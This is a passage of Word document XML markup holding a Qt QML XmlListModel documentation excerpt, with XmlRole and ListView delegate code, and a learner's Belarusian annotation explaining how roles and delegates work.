        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:hyperlink r:id="rId1626" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"wanted"</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> query</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"boolean(@wanted)"</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accessing the model data for the above roles from a delegate:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="00490E7E"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627" w:history="1">
        <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001B046D" w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B046D"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width</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>300</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height</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</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model</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model</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>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hyperlink r:id="rId1628" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>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text</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title </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 ("</w:t>
      </w:r>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type </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t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>")"</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font</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bold</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wanted </w:t>
      </w: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hyperlink r:id="rId1629" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>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text</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first_author </w:t>
      </w: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B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:hyperlink r:id="rId1630" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>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text</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> year </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="001B046D" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="002736BE" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See the</w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1631" w:history="1">
        <w:r w:rsidRPr="001B046D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>W3C XPath 2.0 specification</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B046D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
      <w:r w:rsidR="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Спасылка па </w:t>
      </w:r>
      <w:r w:rsidR="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Path</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Language</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Як я разумею, тут ёсць функцыі прывядзення тыпаў. Акрамя гэтага, як я ўсвядоміў, кожная роля вызначае тую частку </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> дакумента, якую мы хочам адлюстраваць. А дэлегат выкарыстоўвае ролі па імёнах. П?</w:t>
      </w:r>
      <w:r w:rsidR="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B046D" w:rsidRPr="002736BE" w:rsidRDefault="001B046D" w:rsidP="001B046D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="1331"/>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>http</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText>://</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>doc</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>qt</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>io</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>qt</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText>-5/</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>qml</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText>-</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>qtquick</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText>-</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>xmllistmodel</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText>-</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>xmllistmodel</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText>.</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:instrText>html</w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>doc</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>-5/</w:t>
      </w:r>
      <w:r w:rsidRPr="008D56D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>-</w:t>
